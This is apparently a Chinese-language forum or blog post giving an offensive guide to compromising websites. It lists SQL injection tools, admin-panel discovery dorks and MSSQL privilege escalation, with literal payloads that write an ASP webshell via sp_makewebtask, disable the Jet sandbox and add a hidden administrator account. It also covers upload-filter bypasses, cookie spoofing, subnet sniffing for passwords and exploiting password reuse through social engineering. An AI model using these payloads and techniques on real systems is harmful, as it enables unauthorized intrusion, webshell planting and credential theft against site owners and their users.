關於SQL注入點的總結

一:注入類: access數據庫 

<1> 首先猜解管理員密碼: 手工猜解(當然,如果你有基礎,這裏就很簡單。如果沒學過,其實只要記下一些常用的語句就可以了。) 工具猜解。我建議用zwell的穿山甲,也就是pangolin..或者是NBSI。前者猜解速度非常強悍。而猜解的準確率兩者都很好。  找出後臺: 用黑吧安全網的明小子或啊D等工具都可以找的。但有時候會找不到。爲什麼呢?建議用多線程後臺掃描工具。裏面的字典你可以從明小子等那些工具裏綜合起來。還有一點。平時檢測網站的時候遇到一些你字典裏沒有的後臺名稱。要注意積累下來。  另外種方法找後臺 當然就是googlehack了。 Admin site:xxx.com 管理 site:xxx.com Site:xxx.com inurl:login 等等。這些靠自己構造。  

<2>跨庫查詢 使用跨庫查詢有兩個前提: 

1:使用union查詢必須知道前一個select裏表的字段數 

2:必須知道目標數據庫的所在位置,絕對路徑。 


SQL網站滲透方法  

MSSQL數據庫:

 1:SA權限 一般說來,無論誰拿到一個SA權限的注射點。都會很開心。

 <1>直接執行net user等命令。 

<2>可列目錄但不能執行系統命令。 可以列出目錄找出網站中可以利用的地方,比如ewebeditor,或者上傳地址(試試是否有上傳漏洞),等等。 或者找服務器下其他網站,然後**之。 如果無其他漏洞可以找到,那就利用備份得到一個webshell。

 <3>無cmdshell 那就恢復之。詳細請在論壇或者百度搜索相關文章。 

<4>如果無法恢復cmdshell 也就是利用的sp_oacreate來執行。可以通過5次shift來登陸3389  


還可以利用sp_makewebtask直接在web目錄裏寫入一句話馬 http://127.0.0.1/sql.asp?id=1';exec%20sp_makewebtask%20'd:\www\xxx.asp','%20select%20''<%25execute(request("a"))%25>''%20';--  


還可以利用沙盒模式提權 EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;-- Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner$ aloner /add")');-- ;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner$ /add")');-- 

 如果上述方法仍然不行,那就猜解出後臺帳戶和密碼,然後登陸後臺。看看有沒什麼可以利用的。 

 2:db權限 Db權限可以列出網站目錄,然後備份。用一句話連接得到webshell. 如果可以列目錄,但無法備份,也同樣可以利用找其他漏洞來**。畢竟整個網站都可以被你瀏覽了。 然後就是猜解出後臺帳戶和密碼登陸後臺了。 還有一種就是關於一篇db權限備份到啓動項得到系統權限。  public權限 此權限很多人不會利用。 但是可以列出目錄的。  Mysql數據庫: Root權限下可以直接利用loadfile讀取網站的文件內容(網站的配置信息)  然後就是注入語句得到管理員密碼,登陸後臺  


二:上傳類

1:直接上傳木馬 

2:修改後綴名修改。比如修改成.asa .cer等。 

3:圖片頭欺騙 在木馬代碼前加上 gif89a,有時可以成功通過驗證。 

4:抓包nc上傳 這個比較煩。這個可以大家自己從網上找一下相關的文章和教程。 

5:直接(抓包)利用明小子或者其他工具上傳木馬  


三:暴庫: 詳細請在論壇或者百度搜索相關文章。 現在暴庫漏洞很少了。  


四:cookies欺騙。 如果我們現在已經知道了XX站管理員的站號和MD5密碼了 但是破解 不出來密碼(MD5是加密後的一個16位的密碼)我們就可以用COOKIE詐騙來實現,把自己的ID修改成管理員的,MD5密碼也修改成他的,有工具可以修改 COOKIE 這樣就答到了COOKIE詐騙的目的,系統以爲你就是管理員了。 (這個漏洞在新雲2.0裏可以利用)  


五:旁註 什麼是旁註呢? 在我們**目標站點不成功的時候,我們可以通過**它服務器的其他網站,得到webshell,然後提權。 這點就需要你對提權有所認識的基礎下了。 在上述幾種方法中我把SQL注入講的稍微詳細些。因爲畢竟現在SQL注入滿天飛。其他幾種漏洞不是太多的。但也不少。呵呵。  

五:嗅探 當我們**目標網站無望,且旁註無望時,我們就需要**服務器所在的C段去得到一個服務器。 比如我們的目標是222.222.222.1。那我們就需要**222.222.222.2----222.222.222.255中的一臺。然後去嗅探得到目標的21 80 1433 3306 3389等對應端口的相關密碼。  


六.社會工程學**。 whois查詢。 得到管理員的姓名,郵箱,電話,等等之類信息 然後通過得到一些信息,可以利用。 比如我們得到xxx.com的管理員油箱是[email protected] 我們就可以去google搜索:[email protected]或者是aaa. 以此類推。 **一個比較容易拿下的站。然後查詢數據庫得到此帳戶註冊時的密碼。 可以試下是否是油箱的密碼。甚至是這個網站的後臺,ftp,等的密碼。社會工程學太深了。我也沒辦法講很多。 但我剛說的這點已經利用很大了。主要利用的還是個人心理。一般密碼設置很多都會去用同一個密碼的。  總結: 滲透這東西太複雜了。主要還是靠自己的靈活運用。以及對各種**方法的理解。無論什麼東西。都是在你不斷的嘗試與探索下得到

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章